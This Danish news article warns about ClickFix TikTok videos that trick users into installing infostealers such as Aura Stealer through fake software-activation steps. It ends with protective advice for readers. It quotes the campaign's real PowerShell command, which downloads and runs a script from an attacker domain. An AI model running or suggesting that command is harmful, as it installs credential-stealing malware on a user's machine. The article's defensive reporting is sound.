En bølge af TikTok-videoer lokker brugere til selv at installere kodeordstjælende malware på deres pc.
Tricket lover gratis Windows, Photoshop eller Spotify Premium, men i stedet for en aktiveringsguide leverer videoerne en kort kommando, som offeret selv kører i PowerShell. Det er nok til, at maskinen overtages.
Angrebsmetoden kaldes ClickFix, og den blev dokumenteret af Trend Micro i maj 2025. Siden er kampagnen vokset, og nye videoer dukker fortsat op på platformen.
Sådan ser svindlen ud
Videoerne er typisk korte, AI-genererede klip med en automatisk stemme, der lover en gratis “aktivering” af kendt software. På skærmen vises en enkelt linje, som seeren bliver bedt om at kopiere ind i PowerShell og køre som administrator.
Linjen ser typisk sådan her ud:
iex (irm slmgr.win/photoshop)
Kommandoen henter en skjult PowerShell-fil fra et eksternt domæne og udfører den med det samme. Det er det eneste, der skal til. Sikkerhedsforsker Xavier Mertens fra SANS Internet Storm Center beskrev kampagnen den 17. oktober 2025 og fandt flere videoer med over 500 likes, hvor brugere blev instrueret i præcis den handling.
I virkeligheden installerer scriptet en infostealer. Den nyeste variant er Aura Stealer, der ifølge BleepingComputer kan hente loginoplysninger fra alle større browsere, 70 forskellige programmer, browserudvidelser, kryptovaluta-wallets og tofaktor-koder. Tidligere versioner af kampagnen leverede Vidar og StealC, som har lignende kapaciteter.
En enkelt video ramte 500.000 visninger
Videoerne efterligner kendte produkter som Windows, Microsoft Office, Photoshop, CapCut og Spotify. En enkelt video, der lovede at “booste” Spotify-oplevelsen, nåede ifølge Trend Micros analyse tæt på 500.000 visninger og over 20.000 likes, inden den blev fjernet.
Ifølge Trend Micro-forsker Junestherry Dela Cruz udnytter angriberne, at TikToks korte, visuelle format gør det nemt at sælge en falsk guide. Hun peger på, at trusselsaktørerne nu anvender TikTok-videoer — formentlig produceret med AI-værktøjer — til at få brugere til at køre PowerShell-kommandoer i den tro, at de aktiverer lovlig software.
De oprindelige konti er ifølge Trend Micro lukket ned, men nye dukker op løbende. Det betyder, at den eneste pålidelige beskyttelse er at genkende mønsteret.
Røde flag: dette skal du aldrig gøre
Selve angrebet kræver, at offeret aktivt udfører kommandoen. Hvis du følger en simpel tjekliste, er du sikker.
- Kopiér aldrig en kommando fra en TikTok-video, en YouTube-tutorial eller en kommentar og indsæt den i PowerShell, Terminal eller Kommandoprompt.
- Vær særligt skeptisk over for ord som “aktiver gratis”, “lås premium op” eller “fix dit Windows på 30 sekunder”.
- Kommandoer der starter med
iex,irm,Invoke-ExpressionellerInvoke-RestMethodhenter og kører kode fra et eksternt domæne. Det er præcis det værktøj, ClickFix-angreb bruger. - Ægte software aktiveres aldrig ved at køre en kommando som administrator fra en video. Hvis nogen siger det, er det svindel.
- Har du allerede kørt sådan en kommando, så skift dine kodeord fra en anden enhed, log alle browsere ud, og kør en fuld scanning med et opdateret antivirusprogram.
Microsoft, Adobe og Spotify aktiverer deres produkter via konti og licensnøgler, ikke via scripts hentet fra ukendte adresser. Reglen er enkel: hvis aktiveringen sker i en sort terminal, er det ikke aktivering — det er en infektion.